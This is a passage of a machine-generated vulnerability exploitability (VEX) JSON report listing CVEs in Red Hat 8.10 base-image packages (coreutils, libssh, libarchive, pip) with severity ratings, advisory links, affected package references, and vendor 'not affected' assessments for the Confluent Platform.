          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-5278",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        121
      ],
      "description": "A flaw was found in GNU Coreutils. The sort utility's begfield() function is vulnerable to a heap buffer under-read. The program may access memory outside the allocated buffer if a user runs a crafted command using the traditional key format. A malicious input could lead to a crash or leak sensitive data.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-5278"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2025/05/27/2"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2025/05/29/1"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2025/05/29/2"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28911"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33124"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33313"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33612"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34102"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:39981"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:44481"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:46836"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:50205"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-5278"
        },
        {
          "url": "https://bugzilla.redhat.com/2368764"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2368764"
        },
        {
          "url": "https://cgit.git.savannah.gnu.org/cgit/coreutils.git/commit/?id=8c9602e3a145e9596dc1a63c6ed67865814b6633"
        },
        {
          "url": "https://cgit.git.savannah.gnu.org/cgit/coreutils.git/tree/NEWS?id=8c9602e3a145e9596dc1a63c6ed67865814b6633#n14"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-5278"
        },
        {
          "url": "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=78507"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-33124.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:28911"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-5278.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-33124.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5278"
        },
        {
          "url": "https://security-tracker.debian.org/tracker/CVE-2025-5278"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-5278"
        }
      ],
      "published": "2025-05-27T21:15:23+00:00",
      "updated": "2026-08-19T02:16:10+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "8.30-17.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-5351",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        415
      ],
      "description": "A flaw was found in the key export functionality of libssh. The issue occurs in the internal function responsible for converting cryptographic keys into serialized formats. During error handling, a memory structure is freed but not cleared, leading to a potential double free issue if an additional failure occurs later in the function. This condition may result in heap corruption or application instability in low-memory scenarios, posing a risk to system reliability where key export operations are performed.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-5351"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:18683"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-5351"
        },
        {
          "url": "https://bugzilla.redhat.com/2369367"
        },
        {
          "url": "https://bugzilla.redhat.com/2376184"
        },
        {
          "url": "https://bugzilla.redhat.com/2376193"
        },
        {
          "url": "https://bugzilla.redhat.com/2383220"
        },
        {
          "url": "https://bugzilla.redhat.com/2383888"
        },
        {
          "url": "https://bugzilla.redhat.com/2433121"
        },
        {
          "url": "https://bugzilla.redhat.com/2436979"
        },
        {
          "url": "https://bugzilla.redhat.com/2436980"
        },
        {
          "url": "https://bugzilla.redhat.com/2436981"
        },
        {
          "url": "https://bugzilla.redhat.com/2436982"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2369367"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376184"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376193"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2383220"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2383888"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433121"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436979"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436980"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436981"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436982"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4877"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4878"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-5351"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8114"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8277"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0964"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0965"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0966"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0967"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0968"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-18683.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:18683"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-5351.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-18683.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5351"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7619-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-5351"
        },
        {
          "url": "https://www.libssh.org/security/advisories/CVE-2025-5351.txt"
        }
      ],
      "published": "2025-07-04T09:15:37+00:00",
      "updated": "2026-06-30T11:16:24+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-5915",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.6,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.6,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.6,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        122
      ],
      "description": "A vulnerability has been identified in the libarchive library. This flaw can lead to a heap buffer over-read due to the size of a filter block potentially exceeding the Lempel-Ziv-Storer-Schieber (LZSS) window. This means the library may attempt to read beyond the allocated memory buffer, which can result in unpredictable program behavior, crashes (denial of service), or the disclosure of sensitive information from adjacent memory regions.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-5915"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-5915"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370865"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/2599"
        },
        {
          "url": "https://github.com/libarchive/libarchive/releases/tag/v3.8.0"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5915"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7601-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-5915"
        }
      ],
      "published": "2025-06-09T20:15:26+00:00",
      "updated": "2026-06-30T11:16:25+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.3.3-7.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
